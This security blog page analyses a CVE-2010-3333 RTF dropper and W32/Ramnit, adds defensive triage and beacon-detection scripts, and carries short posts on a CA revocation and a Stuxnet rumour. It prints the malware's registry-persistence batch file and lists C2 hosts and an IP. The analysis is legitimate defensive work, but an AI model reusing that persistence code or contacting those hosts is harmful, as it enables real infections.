<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhapaZPdbPE9fLMzHbSKgveRjtHrPdIKmHXiAjRLLacdtN5w8okaBDc72QB5X25T2nkIMfKgzg10RsP1b9stkr5JWWgUyWWWoxeM1PpefHt93xXuDi6YR4ZyiRIZskxrnBqMbuHqlwXp4o/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhapaZPdbPE9fLMzHbSKgveRjtHrPdIKmHXiAjRLLacdtN5w8okaBDc72QB5X25T2nkIMfKgzg10RsP1b9stkr5JWWgUyWWWoxeM1PpefHt93xXuDi6YR4ZyiRIZskxrnBqMbuHqlwXp4o/s400/5.png" width="400" /></a></div>
<div style="text-align: center;">
</div>
<br />
Converting the hex back to binary reveals some interesting strings. I'm not sure why it tries to run the ping command against localhost (pinging 127.0.0.1 is a common trick in droppers to introduce a short delay before the next step). Once the malicious .doc is opened, it creates a file named csrss.exe (MD5 921C724CCB04B9F672B294FFFF83CE7B), executes it, then renames it to 'winword.exe'. It then launches cmd.exe to ping 127.0.0.1 with 1 byte. After that, the malware opens a clean decoy Word document.<br />
<div style="text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsyai417dQ6cW-y4gE79Xs71lKnHrEhMoJfupJps32EJtDb_K-5pqHqqK871nKtA85s8dE-NfsUDfUyOtczJO5ZEDmta_bUZwVnDe0Oe-Fyky3O2fG7JmUM_hR1an3mdb0F8crp-cAKV8/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsyai417dQ6cW-y4gE79Xs71lKnHrEhMoJfupJps32EJtDb_K-5pqHqqK871nKtA85s8dE-NfsUDfUyOtczJO5ZEDmta_bUZwVnDe0Oe-Fyky3O2fG7JmUM_hR1an3mdb0F8crp-cAKV8/s400/4.png" width="400" /></a></div>
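The steps above (find the long hex run, decode it, spot the 0x41 slide, pull out the readable strings) can be scripted so that the next RTF attachment is triaged in seconds. The script below is an added example and not part of this post; it builds a constructed minimal RTF whose hex blob mimics what the post describes (a 0x41 slide, a few filler bytes, a ping command and the two executable names), so it is not gigi.doc. CVE-2010-3333 itself is a stack buffer overflow in Word's RTF parser; the triage here is purely static and does not trigger the bug, it only tells you whether a file is worth detonating in a sandbox.

```python
"""Static triage of an RTF file that embeds a binary payload as hex text.

Added example, not from the original post. The document below is
CONSTRUCTED: a minimal RTF with one hex blob made of a 0x41 slide, a few
opaque bytes, readable strings and some filler, mimicking what the post
describes. The real gigi.doc is not reproduced here."""
import re

HEX_RUN = re.compile(rb"(?:[0-9A-Fa-f]{2}){64,}")   # >= 64 bytes of hex text
ASCII_STR = re.compile(rb"[\x20-\x7e]{5,}")        # printable runs, 5+ chars


def build_sample_rtf():
    payload = (b"A" * 200                              # 0x41 slide
               + b"\x90\x90\xeb\x10"                    # opaque bytes
               + b"ping 127.0.0.1 -n 1\x00"             # constructed command string
               + b"csrss.exe\x00winword.exe\x00"        # names seen in the post
               + bytes(range(0, 32)))                   # non-printable filler
    hexblob = payload.hex().encode()
    return (b"{\\rtf1\\ansi\\deff0 {\\fonttbl{\\f0 Arial;}}\n"
            b"{\\object\\objemb{\\*\\objdata " + hexblob + b"}}\n"
            b"Hello\\par }")


def is_rtf(data):
    """RTF regardless of the file extension: the header is always {\\rtf."""
    return data.lstrip().startswith(b"{\\rtf")


def hex_payloads(data):
    """Decode every long run of hex text into bytes."""
    return [bytes.fromhex(m.group(0).decode()) for m in HEX_RUN.finditer(data)]


def slide_runs(blob, value=0x41, min_run=64):
    """(offset, length) of runs of a single byte value: the slide signature."""
    runs, i, n = [], 0, len(blob)
    while i < n:
        if blob[i] != value:
            i += 1
            continue
        j = i
        while j < n and blob[j] == value:
            j += 1
        if j - i >= min_run:
            runs.append((i, j - i))
        i = j
    return runs


def strings(blob):
    """Printable strings, ignoring single-repeated-character runs (the slide)."""
    return [s.decode() for s in ASCII_STR.findall(blob) if len(set(s)) > 1]


def triage(data):
    report = {"is_rtf": is_rtf(data), "payloads": []}
    for blob in hex_payloads(data):
        report["payloads"].append({"size": len(blob),
                                   "slides": slide_runs(blob),
                                   "strings": strings(blob)})
    return report


if __name__ == "__main__":
    for key, val in triage(build_sample_rtf()).items():
        print(key, val)
```

On a real sample, run `triage(open("gigi.doc", "rb").read())`: an RTF file carrying a hex blob that decodes to a slide followed by command lines and executable names is malicious until proven otherwise.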
<br />
The running csrss.exe creates Update.bat in the user's Start Menu Startup folder with the following content:<br />
<blockquote>
<br />
<pre>Echo off
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "C:\DOCUME~1\User\LOCALS~1\Temp\csrss.exe" /f
del %%0</pre>
<br /></blockquote>
The batch file adds a startup entry (the Load value under HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows) pointing to csrss.exe in the user's temporary folder, then deletes itself. Next, let's look at the packet capture:<br />
<br />
<div style="text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijRmCS8nCki6ixoEQZv0WkbYdr3ciHDCMVZi8TpT7Lnty7R3Gvj81v59QwypZeVF4kAZKJNveEbxLdipHUuFLkloNesg_Mn5KBQkky2_ta5hvjKraDXcTw-W2UXRqsVbB-6UZtTjyUuoc/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijRmCS8nCki6ixoEQZv0WkbYdr3ciHDCMVZi8TpT7Lnty7R3Gvj81v59QwypZeVF4kAZKJNveEbxLdipHUuFLkloNesg_Mn5KBQkky2_ta5hvjKraDXcTw-W2UXRqsVbB-6UZtTjyUuoc/s400/3.png" width="400" /></a></div>
<br />
The capture shows the malware attempting HTTP POST requests to the following URLs:<br />
<blockquote>
http://ymhz1.dyndns.biz:8080/<br />
http://2011fm.dyndns.org:8080/<br />
IP Address: 114.248.90.120</blockquote>
<br />
The IP address is located in China and was still active at the time of writing. csrss.exe stays resident in memory, sleeping for 60 seconds between check-ins to the URLs above.<br />
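A 60-second check-in to a dynamic-DNS host on port 8080 is exactly the pattern a proxy log lets you hunt for. The script below is an added example, not part of this post: it parses constructed proxy log lines (mirroring the behaviour described, POSTs to the dyndns hosts roughly every minute mixed with ordinary browsing), groups requests by client, host, port and method, and flags series whose inter-request gaps are nearly constant, or that POST to a dynamic-DNS domain at all. The dynamic-DNS suffix list and the thresholds are assumptions.

```python
"""Beacon detection over proxy/HTTP logs.

Added example, not from the original post. The log lines are CONSTRUCTED
to mirror the behaviour described: POST requests to ymhz1.dyndns.biz:8080
roughly every 60 seconds, mixed with ordinary browsing from two clients.
The suffix list and thresholds are assumptions."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

DYNDNS_SUFFIXES = (".dyndns.biz", ".dyndns.org", ".no-ip.org")  # assumed list

LOG = """\
2011-12-05 10:00:00 192.168.1.20 POST ymhz1.dyndns.biz:8080 /
2011-12-05 10:00:07 192.168.1.20 GET www.google.com:80 /search?q=news
2011-12-05 10:01:00 192.168.1.20 POST ymhz1.dyndns.biz:8080 /
2011-12-05 10:01:59 192.168.1.20 POST ymhz1.dyndns.biz:8080 /
2011-12-05 10:02:31 192.168.1.20 GET www.google.com:80 /images
2011-12-05 10:03:01 192.168.1.20 POST ymhz1.dyndns.biz:8080 /
2011-12-05 10:04:00 192.168.1.20 POST ymhz1.dyndns.biz:8080 /
2011-12-05 10:00:03 192.168.1.21 GET www.google.com:80 /
2011-12-05 10:05:40 192.168.1.21 GET www.google.com:80 /mail
2011-12-05 10:09:12 192.168.1.21 GET www.google.com:80 /mail
"""


def parse(log):
    """Rows of (timestamp, src, method, host, port, path) from the constructed format."""
    rows = []
    for line in log.splitlines():
        day, clock, src, method, hostport, path = line.split(" ", 5)
        host, port = hostport.rsplit(":", 1)
        rows.append((datetime.fromisoformat(day + " " + clock), src, method, host, int(port), path))
    return rows


def find_beacons(rows, min_hits=4, max_cv=0.1):
    """Group by (src, host, port, method) and flag regular series.

    Regularity is the coefficient of variation of the gaps between requests
    (std/mean): a sleep(60) loop gives a CV near zero, browsing does not."""
    series = defaultdict(list)
    for ts, src, method, host, port, path in rows:
        series[(src, host, port, method)].append(ts)
    hits = []
    for (src, host, port, method), times in series.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else float("inf")
        dyn = host.endswith(DYNDNS_SUFFIXES)
        if cv <= max_cv or (dyn and method == "POST"):
            hits.append({"src": src, "host": host, "port": port, "method": method,
                         "count": len(times), "period_s": round(avg, 1),
                         "cv": round(cv, 3), "dyndns": dyn})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(parse(LOG)):
        print(hit)
```

The CV threshold is deliberately loose; a real implementation should also discount well-known hosts (update servers beacon regularly too) and look at response sizes, which for a C2 check-in with no tasking are usually tiny and constant.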
<br />
Note: <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3333">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3333</a><br />
<br />
<h3>
W32/Ramnit.C Quick Analysis</h3>
<br />
Published 2011-12-02 (updated 2012-08-09).<br />
<br />
I just received a laptop from a friend of mine that was heavily infected with multiple viruses. I don't know how he managed to use it comfortably for a few months, until the viruses' activity became too annoying. One of the more interesting samples for a quick analysis is W32/Ramnit. According to several security blogs this malware was first discovered around April 2010. Let's check it out.<br />
<br />
On the first scan I noticed that many of the infections were in HTML files (Avira flagged a large number of infected HTML files).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7Aotyho56oxKBoj-i0GeLe4FhyphenhyphenwfoJptEcoJgHBxlQsGXFq4jcqv396C41gVt9fk_VsCKqelqLf0pMxCARcQEUwuatSNfMyL_2yQhqSk3N1RVqoOnW0pincq26rYSmchS0KVxsDy6nes/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7Aotyho56oxKBoj-i0GeLe4FhyphenhyphenwfoJptEcoJgHBxlQsGXFq4jcqv396C41gVt9fk_VsCKqelqLf0pMxCARcQEUwuatSNfMyL_2yQhqSk3N1RVqoOnW0pincq26rYSmchS0KVxsDy6nes/s400/11.png" width="400" /></a></div>
<div style="text-align: center;">
</div>
<br />
<div style="text-align: left;">
The HTML files contain a small VBScript that carries an embedded EXE in hex form and drops it into the Windows temporary folder when the user opens the infected HTML file in a browser (only Internet Explorer runs VBScript, so the dropper does nothing in other browsers). The end of each infected HTML file carries random garbage characters, apparently to keep the infected files from having a fixed size.</div>
<br />
<div style="text-align: left;">
Once the EXE has been dropped, the script executes it. The EXE is 108,032 bytes (MD5 9B49FEC7E03C33277F188A2819B8D726) and is packed with UPX 3.03. Upon execution it performs the following routine:</div>
<ul>
<li>Searches for files with EXE, DLL and HTML extensions.</li>
<li>Infects every EXE and DLL found by appending an additional .text section to the PE file.</li>
<li>Infects HTML files by inserting a VBScript that carries the EXE in hexadecimal form.</li>
</ul>
<br />
<div>
The infected PE file gains an additional section named .text, as shown in the image below:</div>
<br />
<div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkhqakCFP2RIB9u9Lxij4PJ6LpZbuN-fdZAKE3k7Pe70xl3YyCl6afwdrwBO_5A68pMqa335ICF1wttjUeA9vSysaW9p8PdVFmOXA0BTWW_zp2LTTIot0iSV2JeOuwstIpTAPeXrKNcfE/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkhqakCFP2RIB9u9Lxij4PJ6LpZbuN-fdZAKE3k7Pe70xl3YyCl6afwdrwBO_5A68pMqa335ICF1wttjUeA9vSysaW9p8PdVFmOXA0BTWW_zp2LTTIot0iSV2JeOuwstIpTAPeXrKNcfE/s400/2.png" width="400" /></a></div>
<br />
<div>
The added .text section is large (about 540 KB) and contains the malicious code. The entry point (EP) is modified so that the malicious code runs first and then jumps back to the original EP to run the host program.</div>
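Both infection markers described above are cheap to check statically: an HTML file whose VBScript holds a hex blob that decodes to an MZ/PE image, and a PE whose entry point sits in a last, duplicate-named, writable .text section. The script below is an added example, not from this post or any AV vendor; it includes a tiny PE32 header builder so that the clean and "infected" images and the HTML page it tests are constructed in memory (they are not Ramnit samples). The section sizes and characteristics are assumptions chosen to mirror the description.

```python
"""Two static checks for the Ramnit infection pattern described above.

Added example, not from the original post or any AV vendor: (1) does an
HTML file carry a VBScript block with a hex blob that decodes to a PE
executable, and (2) does a PE have its entry point inside an appended,
duplicate-named .text section. The PE images and HTML page below are
CONSTRUCTED with a tiny header-only builder; they are not Ramnit samples."""
import re
import struct

IMAGE_SCN_MEM_WRITE = 0x80000000
HEX_BLOB = re.compile(rb"(?:[0-9A-Fa-f]{2}){32,}")


def build_pe(sections, entry_rva):
    """Minimal PE32 image (headers only): sections = [(name, vaddr, size, chars)]."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * 14 + struct.pack("<I", entry_rva)
    opt += b"\0" * (224 - len(opt))                                 # rest of the optional header
    hdrs = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                    size, vaddr, size, 0, 0, 0, 0, 0, chars)
        for name, vaddr, size, chars in sections)
    return dos + coff + opt + hdrs


def parse_sections(pe):
    """Return (AddressOfEntryPoint, [section dicts]) from a PE image."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    entry = struct.unpack_from("<I", pe, opt + 16)[0]
    sections = []
    for i in range(nsec):
        off = opt + opt_size + 40 * i
        name, vsize, vaddr, rawsize = struct.unpack_from("<8sIII", pe, off)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vaddr": vaddr, "size": max(vsize, rawsize), "chars": chars})
    return entry, sections


def entry_point_check(pe):
    """Flag an entry point living in a last/duplicate-named/writable section."""
    entry, secs = parse_sections(pe)
    idx = next((i for i, s in enumerate(secs)
                if s["vaddr"] <= entry < s["vaddr"] + s["size"]), None)
    reasons = []
    if idx is None:
        reasons.append("entry point outside every section")
    else:
        names = [s["name"] for s in secs]
        if idx == len(secs) - 1 and len(secs) > 1:
            reasons.append("entry point is in the last section")
        if names.count(names[idx]) > 1:
            reasons.append("duplicate section name " + names[idx])
        if secs[idx]["chars"] & IMAGE_SCN_MEM_WRITE:
            reasons.append("entry section is writable")
    return {"entry": entry, "entry_section": secs[idx]["name"] if idx is not None else None,
            "suspicious": bool(reasons), "reasons": reasons}


def html_carries_pe(html):
    """True if a VBScript block in the HTML holds a hex blob decoding to MZ/PE."""
    if not re.search(rb"<script[^>]*vbscript", html, re.I):
        return False
    for m in HEX_BLOB.finditer(html):
        blob = bytes.fromhex(m.group(0).decode())
        if blob[:2] == b"MZ" and b"PE\0\0" in blob:
            return True
    return False


# Constructed samples: a clean two-section image, and the same image with a
# ~540 KB writable .text section appended and the entry point moved into it.
CLEAN = [(".text", 0x1000, 0x400, 0x60000020), (".data", 0x2000, 0x200, 0xC0000040)]
INFECTED = CLEAN + [(".text", 0x3000, 0x87000, 0xE0000060)]


def build_sample_html(pe):
    """Constructed dropper-like page: only the hex payload, no file-writing code."""
    return (b'<html><body><script language="VBScript">\nDim h: h = "'
            + pe.hex().encode() + b'"\n</script></body></html>')


if __name__ == "__main__":
    print(entry_point_check(build_pe(CLEAN, 0x1100)))
    print(entry_point_check(build_pe(INFECTED, 0x3010)))
    print(html_carries_pe(build_sample_html(build_pe(INFECTED, 0x3010))))
```

Run `entry_point_check` over every EXE and DLL on a suspect disk and `html_carries_pe` over every .htm/.html file; the PE check also catches packers and other file infectors that append a code section, so treat hits as leads for a full scan rather than a verdict.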
<br />
<div>
Manual cleaning of this type of malware is probably impossible for an end user: with so many files infected it is very hard to remove by hand. The practical fix is either to run the <a href="http://adf.ly/P7aF" target="_blank" title="NOD32 On-Demand Scanner (Portable)">NOD32 On-Demand Scanner (Portable)</a> or to format the hard drive and reinstall Windows.</div>
<br />
<h3>
Revoking Trust in the DigiCert Sdn. Bhd. Intermediate Certificate Authority</h3>
<br />
Published 2011-11-04 (updated 2012-08-06).<br />
<br />
Just read the news today about Mozilla revoking trust in a certificate authority whose certificates are commonly used, especially in Malaysia. The text below is taken from the Mozilla Security Blog.<br/><blockquote>Issue<br/><br/>Entrust, Inc., a certificate authority in Mozilla’s root program, has informed us that one of their subordinate CAs, the Malaysian company DigiCert Sdn. Bhd, has issued 22 certificates with weak keys. While there is no indication they were issued fraudulently, the weak keys have allowed the certificates to be compromised. Furthermore, certificates from this CA contain several technical issues. They lack an EKU extension specifying their intended usage and they have been issued without revocation information.<br/><br/>This is not a Firefox-specific issue. Nevertheless, given our concerns about the technical practices of this certificate authority, we intend to revoke trust in the DigiCert Sdn. Bhd. intermediate certificate authority.<br/><br/>DigiCert Sdn. Bhd is a Malaysian subordinate CA under Entrust and Verizon (GTE CyberTrust). It bears no affiliation whatsoever with the US-based corporation DigiCert, Inc., which is a member of Mozilla’s root program.<br/><br/>Impact<br/><br/>An attacker could use one of these weak certificates to impersonate the legitimate owners. This could deceive users into trusting websites or signed software appearing to originate from these owners, but actually containing malicious content or software. The certificates in question were issued to a mix of Malaysian government websites and internal systems. We do not believe other sites are at risk.<br/><br/>Status<br/><br/>Mozilla is revoking trust in all certificates issued by DigiCert Sdn. Bhd. and the update will be in Firefox 8 and Firefox 3.6.24. Entrust has issued their own statement on the subject.<br/><br/>Credit<br/><br/>The issue was reported to us by Entrust, Inc.</blockquote><br/>Source: <a href="http://blog.mozilla.com/security/2011/11/03/revoking-trust-in-digicert-sdn-bhd-intermediate-certificate-authority/">http://blog.mozilla.com/security/2011/11/03/revoking-trust-in-digicert-sdn-bhd-intermediate-certificate-authority/</a><br/>
<br />
<h3>
New Version of Stuxnet 'Stars' Reported</h3>
<br />
Published 2011-04-26 (updated 2012-08-09).<br />
<br />
Just read a few news reports today saying that a new version of Stuxnet has appeared in Iran. At this moment I can't find any sample related to this 'Stuxnet v2', codenamed 'Stars'. The news is still unclear and could be another rumour, or just a new variant of some other malware. More updates will follow as they become available.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK29vd6KJrCIzVTQ1yDRttRI1rHnnuM2bwT0_rJyNMhFRpF3sfAgfWkCvgudfgU4O-L6KjKCtlYgp9NEoAgsxUPVZidVjxydu5LOpx4LJpjPhPxd7c0em8tPZ4wh4sxE75LgJeEAvox2o/s1600/Stuxnet1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK29vd6KJrCIzVTQ1yDRttRI1rHnnuM2bwT0_rJyNMhFRpF3sfAgfWkCvgudfgU4O-L6KjKCtlYgp9NEoAgsxUPVZidVjxydu5LOpx4LJpjPhPxd7c0em8tPZ4wh4sxE75LgJeEAvox2o/s400/Stuxnet1.jpg" width="400" /></a></div>
<center>
<br /></center>
UPDATES (1 MAY 2011):<br />
After checking most of the available resources, I was unable to find a sample or any solid news about the story. For now I consider it a hoax.<br />
<br />
<strong>News related:</strong><br />
<a href="http://www.f-secure.com/weblog/">http://www.f-secure.com/weblog/</a><br />
<a href="http://blogs.csoonline.com/1483/after_stuxnet_a_star_is_born">http://blogs.csoonline.com/1483/after_stuxnet_a_star_is_born</a><br />
<a href="http://www.google.com.my/search?um=1&hl=en&prmdo=1&biw=1138&bih=519&q=%27stars%27%20stuxnet&ie=UTF-8&sa=N&tab=iw">http://www.google.com.my/search?um=1&hl=en&prmdo=1&biw=1138&bih=519&q=%27stars%27%20stuxnet&ie=UTF-8&sa=N&tab=iw</a><br />
<br />
<h3>
The 5th annual Counter-eCrime Operations Summit (CeCOS V)</h3>
<br />
Published 2011-04-14 (updated 2012-08-06).<br />
<br />
<p style="text-align: justify;">The fifth annual Counter-eCrime Operations Summit (CeCOS V) will engage questions of operational challenges and the development of common resources for the first responders and forensic professionals who protect consumers and enterprises from the ecrime threat every day. This year's meeting will focus on the development of response paradigms and resources for counter-ecrime managers and forensic professionals. Presenters will proffer case studies of national and regional economies under attack, narratives of successful trans-national forensic cooperation as well as models for cooperation and unified response against ecrime and data resources for forensic activities.</p><br/><p><center><img src="http://www.antiphishing.org/images/kualaLumpurWebBanner.jpg" alt="CeCOS V" /></center></p><br/><p style="text-align: justify;">The program will be spread across a three-day conference event on April 27, 28 and 29 in <a href="http://maps.google.com/maps/ms?hl=en&ie=UTF8&msa=0&msid=211354629192232708452.0004994579a6db888dd3c&ll=3.155085,101.710954&spn=0.012041,0.016587&z=16">Kuala Lumpur, Malaysia at the Crown Plaza Hotel</a>. The APWG believes under-appreciated operational issues are important enough to be the focus of a conference dedicated exclusively to them. They're often talked about as sidelights but rarely addressed directly as an organizational imperative for the entire counter-ecrime community. CeCOS V makes those operational issues the central focus of the program for the benefit of all ecrime fighters.</p><br/><p style="text-align: justify;"><strong><span style="text-decoration: underline;">References:</span></strong></p><br/><p style="text-align: justify;"><a href="http://www.antiphishing.org/events/2011_opSummit.html">http://www.antiphishing.org/events/2011_opSummit.html</a></p>